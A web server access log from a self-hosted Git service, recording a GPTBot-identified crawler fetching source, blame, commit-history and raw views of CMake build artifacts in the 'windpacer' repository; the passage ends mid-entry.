"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10315] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11135] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13299] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10092] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11164] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10523] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9952] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14249] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33665] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:25:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:25:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10087] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10056] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:25:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:25:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43098] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9978] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9979] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43100] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21732] [Gzip 28.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21733] [Gzip 28.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14030] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11185] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11490] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11164] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11186] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14030] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14031] [Gzip 9.40] [Sent-to 